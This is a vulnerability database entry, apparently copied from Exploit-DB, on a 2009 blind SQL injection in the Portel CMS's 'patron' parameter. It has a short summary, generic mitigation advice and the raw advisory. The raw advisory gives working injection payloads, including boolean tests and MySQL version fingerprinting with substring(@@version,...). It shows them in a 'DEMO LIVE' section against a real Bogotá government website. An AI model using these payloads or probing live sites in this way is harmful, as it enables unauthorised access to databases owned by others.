Portel (patron) Blind SQL-injection Vulnerability

vendor:

Portel

by:

Chip D3 Bi0s

7,5

CVSS

HIGH

Blind SQL injection

CWE

Product Name: Portel

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Portel (patron) Blind SQL-injection Vulnerability

Portel is a content management system (CMS) developed by a Colombian company. It is vulnerable to Blind SQL injection, which allows an attacker to execute arbitrary SQL commands on the underlying database. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. For example, an attacker can send a malicious SQL query to the vulnerable application as follows: http://localHost/path/libreria/php/decide.php?patron=n<Blind Sql Code>, where n is a valid patron. This can be demonstrated by sending the following requests to the vulnerable application: http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+1=1/* (true) and http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+1=2/* (false).

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

------------------------------------------------------------------------------
Portel (patron) Blind SQL-injection Vulnerability
------------------------------------------------------------------------------


 #####################################################
 # [+] Author        :  Chip D3 Bi0s                 #
 # [+] Email         :  chipdebios[alt+64]gmail.com  #
 # [+] Vulnerability :  Blind SQL injection          #
 # [+] Group         :  LatinHackTeam                #
 #####################################################

**********************************************************************
 Info Cms:
 * Name      : Portel
 * Web       : http://www.porteleditor.com
 * dowloand  : http://www.porteleditor.com/instalacion/portelv2008.zip
               http://rapidshare.com/files/263383411/portelv2008.zip.html
 * Country   : Colombia
               
**********************************************************************


Example:
http://localHost/path/libreria/php/decide.php?patron=n<Blind Sql Code>
n = patron valid


DEMO LIVE:

http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+1=1/*
true

http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+1=2/*
else

http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+substring(@@version,1,1)=4/*
else

http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+substring(@@version,1,1)=5/*
true


etc, etc....

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-08-05]